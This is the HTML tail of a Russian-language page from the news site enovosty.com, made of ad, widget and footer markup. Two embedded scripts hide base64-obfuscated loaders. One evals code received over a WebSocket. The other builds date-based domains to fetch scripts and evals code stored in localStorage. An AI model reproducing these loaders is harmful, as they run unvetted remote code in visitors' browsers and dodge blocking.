return;window.rtIsWebSocket = true;var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';function runExternalMessage(data) {worker36857.postMessage(data);}worker36857 = new Worker(URL.createObjectURL(
new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
));worker36857.onmessage = function(m) {var json = JSON.parse(m.data),content = JSON.parse(json)['content'];eval(content);};worker36857.postMessage(JSON.stringify({command: 'init',informer_id: tickerID,url: script.src
}));};tag.parentNode.insertBefore(script, tag);})();</script></div></div> </div><br><div><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank"><img alt="Экономические новости youtube" src="https://enovosty.com/wp-content/themes/eizvestia/img/ENTV2_Svedenie.gif"></a></div></br><div id="adpartner-jsunit-4125"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=4125&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div></br><div><a href="https://enovosty.com/society/full/2508-immunolog-andrej-volyanskij-zhestkij-karantin-rastyanet-pandemiyu-v-ukraine-na-dolgie-gody" target="_blank" rel="noreferrer noopener"><img alt="карантин" src="/wp-content/uploads/2020/08/Imun1.jpg"></a></div></br><link rel="stylesheet" type="text/css" href="https://s1.gismeteo.ua/static/css/informer2/gs_informerClient.min.css"><div id="gsInformerID-RpMlQd24Vh0i0g" class="gsInformer" style="width:300px;height:168px"> <div class="gsIContent"> <div id="cityLink"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/" title="Погода в Киеве" target="_blank"> <img src="https://s1.gismeteo.ua/static/images/gisloader.svg" width="24" height="24" alt="Погода в Киеве"> </a> </div> <div class="gsLinks"> <table> <tr> <td> <div class="leftCol"> <a href="https://www.gismeteo.ua" target="_blank" title="Погода"> <img alt="Погода" src="https://s1.gismeteo.ua/static/images/informer2/logo-mini2.png" align="middle" border="0" height="16" width="11"/> <img src="https://s1.gismeteo.ua/static/images/gismeteo.svg" border="0" align="middle" style="left: 5px; top:1px"> </a> </div> <div class="rightCol"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/14-days/" target="_blank" title="Погода в Киеве на 2 недели"> <img src="https://s1.gismeteo.ua/static/images/informer2/forecast-2weeks.ru.svg" border="0" align="middle" style="top:auto" alt="Погода в Киеве на 2 недели"> </a> </div> </td> </tr> </table> </div> </div></div><script src="https://www.gismeteo.ua/ajax/getInformer/?hash=RpMlQd24Vh0i0g" type="text/javascript"></script></br><div id="MIXADV_7463" class="MIXADVERT_NET"></div> <script>var node7463 = document.getElementById("MIXADV_7463");if( node7463 )
{var script = document.createElement("script");script.charset = "utf-8";script.src = "https://m.mixadvert.com/show/?id=7463&r="+Math.random();
node7463.parentNode.appendChild(script);script.onerror = function(){window.eval(
atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDc0NjMgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNzQ2My5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTc0NjMucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTc0NjMuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjc0NjMiKSkgfSwgNTAwMCk7ICA7fTsg")
);}}</script><br><div id="help" style="margin-bottom: 15px;"><a href="https://ubb.org.ua/uk/category/3/ " target="_blank" rel="nofollow"><img style="width:300px;" src="/wp-content/themes/eizvestia/img/banner_subscribe_uk.png" alt="help"></a></div><br> <div class="wiget ukr_links" style="font-size:9px; color:#336699;"> </div> <a style="margin-bottom:5px;display: inline-block;" href="https://www.bigmir.net/" target="_blank" onClick='img=new Image();img.src="//www.bigmir.net/?cl=101585";'><img src="//c.bigmir.net/?s101585&t8&l1" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100"></a> <br><script type="text/javascript">document.write('<a href="//www.liveinternet.ru/click" '+
'target="_blank"><img src="//counter.yadro.ru/hit?t52.6;r'+
escape(document.referrer)+((typeof(screen)=='undefined')?'':
';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+';u'+escape(document.URL)+
';h'+escape(document.title.substring(0,150))+';'+Math.random()+
'" alt="" title="LiveInternet: показане число переглядів і'+
' відвідувачів за 24 години" '+
'border="0" width="88" height="31"><\/a>')
</script><div class="wiget simple_pr" id="photoPromo" style="background: #ffe3c8;"><div class="caption"><p style=" text-transform: uppercase; font-weight: 700; font-family: arial,verdana,tahoma; margin: 0; display: block; float: left; color: #fff; padding: 0 5px 0 4px; background-color: #f93; height: 17px; font-size: 12px;
"><a style="color: #fff;" href="https://enovosty.com/photo-nedeli">Фото недели</a></p></div><script>jQuery(document).ready(function($){$('#slider_gallery').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><style>.topnews_single.gallery div.anythingSlider-minimalist-round span.arrow{height:170px}</style><div class="topnews_single slide gallery" style="width: 258px; height: 230px; padding: 10px 10px 0; background: #fff; margin: 10px;"><ul id="slider_gallery"><li><ul class="tact"><li id="li0" style="width:252px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=566&pid=12312" style="height: 170px;"><img width="252" src="https://enovosty.com/wp-content/gallery/ocean_art/thumbs/thumbs_20.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Потрясающие снимки с конкурса подводной фотографии Ocean Art 2020"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=566&pid=12312" title="Потрясающие снимки с конкурса подводной фотографии Ocean Art 2020" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Потрясающие снимки с конкурса подводной фотографии Ocean Art 2020</a></li></ul></li><li><ul class="tact"><li id="li1" style="width:252px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=565&pid=12292" style="height: 170px;"><img width="252" src="https://enovosty.com/wp-content/gallery/svetil/thumbs/thumbs_20.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Удивительные светильники из барахолок, от которых больше удивления, чем пользы"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=565&pid=12292" title="Удивительные светильники из барахолок, от которых больше удивления, чем пользы" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Удивительные светильники из барахолок, от которых больше удивления, чем пользы</a></li></ul></li><li><ul class="tact"><li id="li2" style="width:252px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=564&pid=12255" style="height: 170px;"><img width="252" src="https://enovosty.com/wp-content/gallery/kamni1/thumbs/thumbs_incrediblestones03-jpg.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Подборка невероятно красивых и редких камней"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=564&pid=12255" title="Подборка невероятно красивых и редких камней" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Подборка невероятно красивых и редких камней</a></li></ul></li><li><ul class="tact"><li id="li3" style="width:252px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=563&pid=12233" style="height: 170px;"><img width="252" src="https://enovosty.com/wp-content/gallery/indiya_zh/thumbs/thumbs_01.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Кадры индийского фотографа, запечатлевшие животных"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=563&pid=12233" title="Кадры индийского фотографа, запечатлевшие животных" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Кадры индийского фотографа, запечатлевшие животных</a></li></ul></li></ul></div> <div class="cls"></div> <a href="https://enovosty.com/photo-nedeli" class="readMore">Все фото &raquo;</a></div><div class="links_bal" style="width:240px;"></div><div class="links_bal" style="width:240px;"></div>  <div class="wiget ukr_links" style="font-size:9px; color:#336699;"> </div></div><div class="cls"></div><script>
window.onload = function() {
// Delay to allow the async Google Ads to load
setTimeout(function() {
// Get the first AdSense ad unit on the page
var ad = document.querySelector("ins.adsbygoogle");
// If the ads are not loaded, track the event
if (ad && ad.innerHTML.replace(/\s/g, "").length == 0) {if (typeof ga !== 'undefined') {// Log an event in Universal Analytics
// but without affecting overall bounce rate
ga('send', 'event', 'Adblock', 'Yes', {'nonInteraction': 1});} else if (typeof _gaq !== 'undefined') {// Log a non-interactive event in old Google Analytics
_gaq.push(['_trackEvent', 'Adblock', 'Yes', undefined, undefined, true]);}}}, 2000); // Run ad block detection 2 seconds after page load
};
</script> </div> <!-- start NEW_content_v1 for enovosty.com <div id="adpartner-jsunit-3430"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=3430&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div> end NEW_content_v1 for enovosty.com --><div class="cls"></div><br> <div id="footer"> <div class="wiget text" style="padding-right:0; margin-right:0;" > <div id="bottom-menu" style="background: #F93; height:40px"> <a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/contacts">КОНТАКТЫ</a>|<a style="display: inline-block; width: 220px;vertical-align: top;" href="https://enovosty.com/politika-konfididencijnosti-ta-zaxistu-personalnix-danix">Политика конфиденциальности<br>и защиты персональных данных</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/redakcionnaya-politika">Редакционная политика</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/newsitemap">Карта сайта</a> </div> <div id="counters" > </div> <div id="textfooter"> <p>2018 &copy; "Экономические новости"</p> <p>Все права защищены. </p><p>Использование материалов разрешается при условии ссылки на <a href="https://enovosty.com" style="color:#336699; text-decoration:underline;">"Экономические новости"</a> (www.enovosty.com). Для интернет-изданий обязательной является прямая гиперссылка, не закрытая от индексации поисковыми системами (отсутствие в ссылке rel="nofollow" или "noindex" ), в первом или втором абзаце опубликованного материала (ссылка должна быть в тексте) на цитируемую статью или новость. Материалы, обозначенные символом <img style="margin-bottom:-3px" src="https://enovosty.com/wp-content/themes/eizvestia/img/reklama.png" width="16" height="14" alt="" />, публикуются на правах рекламы. <br />Производство онлайн-департамента газеты "Экономические новости" (www.enovosty.com).</p> </div>  <a href="/contacts" target="_blank" rel="nofollow" style="
float: right;
font-weight: bold;
color: #369;
padding: 10px;
">Размещение рекламы</a> </div> </div> <div class="links_bal"> </div></div><script src="https://enovosty.com/wp-content/themes/eizvestia/js/eishare.js?v=4"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/afk.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/mailto.js"></script><div id="error-notification-id" class="enp-4816709"></div><div id="error-notification-settings" style="display: none;"><p>Спасибо большое за Вашу помощь. Мы исправим ошибку в ближайшее время!</p></div> <script>var isProcessing = false;function alter_ul_post_values(obj,post_id,ul_type){if (isProcessing)
return;isProcessing = true;jQuery(obj).find("span").html("..");jQuery.ajax({type: "POST",url: window.location.origin + "/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php",data: "post_id="+post_id+"&up_type="+ul_type,success: function(msg){jQuery(obj).find("span").html(msg);isProcessing = false;}});}</script> <script type='text/javascript'>
var enp = {"ajaxurl":"\/wp-admin\/admin-ajax.php","barBackground":"#ff9933","barPosition":"bottom","barTextColor":"#ffffff","baseurl":"https:\/\/enovosty.com","confirmation":"1","cbTitle":"Are you sure?","cbError":"Error","cbOK":"OK","cbCancel":"Cancel"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/error-notification/error_notifi.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/ajax-comment-loading/js/google-acl2.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/js/url-span.js'></script><script type='text/javascript'>
var socialWarfare = {"addons":[],"post_id":"4816709","floatBeforeContent":""};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/social-warfare/assets/js/script.min.js'></script><script type='text/javascript' src='//imasdk.googleapis.com/js/sdkloader/ima3.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/themes/eizvestia/videojs/video.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/themes/eizvestia/videojs/videojs.ads.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/themes/eizvestia/videojs/videojs.ima.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/wp-embed.min.js'></script><script type='text/javascript'>
var icl_vars = {"current_language":"ru","icl_home":"https:\/\/enovosty.com\/","ajax_url":"https:\/\/enovosty.com\/wp-admin\/admin-ajax.php","url_type":"1"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress_js.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/comment-reply.min.js'></script><script type="text/javascript"> var swp_nonce = "63b05b8aae";var swpFloatBeforeContent = false;var swpClickTracking = false;</script><script>//new adriver("adriver_banner_A1", {sid:101080,sz:"A1", bt:52,pz:1,bn:0});
new adriver("adriver_banner_B4", {sid:101080,sz:"B4", bt:52,pz:2,bn:1});new adriver("adriver_banner_C1", {sid: 101080, sz: "C1", pz: 1, bn: 1, bt:52});//new adriver("adriver_banner_C2", {sid: 101080, sz: "C2", pz: 2, bn: 2, bt:52});
new adriver("adriver_banner_C3", {sid: 101080, sz: "C3", pz: 2, bn: 3, bt:52});new adriver("adriver_banner_branding", {sid: 101080, sz: "branding", bt:52});//new adriver("adriver_banner_1964215071", {sid:101080, bt:52, sz:'contentroll'});
</script><script>document.getElementById('logo').style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";//img.style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";
</script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/iepngfix.min.js" ></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/png_fix.js" ></script><script>//var pollsL10n = document.getElementById('pollsL10n');
</script><!--<script type="text/javascript">admixerML.fn.push(function () {admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f',ph: 'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069',i: 'inv-nets'
});admixerML.singleRequest();});</script>--><div class="container"><div id="div-gpt-ad-1595961600637-0"><script>catfish('div-gpt-ad-1595961600637-0')
</script></div></div><!--<script type="text/javascript" charset="utf-8">(function(d,s){var o=d.createElement(s);o.async=true;o.type="text/javascript";o.charset="utf-8";if (location.protocol == "https:")
{ o.src="https://js-ru.redtram.com/n4p/0/30/ticker_30546.js"; }else
{ o.src="https://js.ru.redtram.com/n4p/0/30/ticker_30546.js"; }var x=d.getElementsByTagName(s)[0];x.parentNode.insertBefore(o,x);})(document,"script");</script>
--><script>jQuery(document).ready(function($){setTimeout(function() { ah2 = $("body .container").height(); $("#brandingimg").css('height', ah2 + 'px'); }, 2500);});</script><script type="text/javascript" src="https://affiliate.ria.com/js/ria_informer.js?riacode=e77f01cd5a912b7be06984da8aae869f" ></script><div id="bfooter" style="width:1004px;margin:0 auto;position: relative;padding: 0 10px;display: block;text-align:left;">&nbsp;</div> <iframe name="n01212138" style="display:none"></iframe><script>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</script><script>var player = videojs('my-player', {responsive: true
});

</script><script type="text/javascript">if (typeof window._tx === "undefined") {var s = document.createElement("script");s.type = "text/javascript";s.async = true;s.src = "//st.onlygip.tech/ssp.js";
(document.getElementsByTagName("head")[0] ||
document.getElementsByTagName("body")[0]).appendChild(s);}window._tx = window._tx || {};window._tx.cmds = window._tx.cmds || [];window._tx.cmds.push(function () {window._tx.init();});</script></body></html>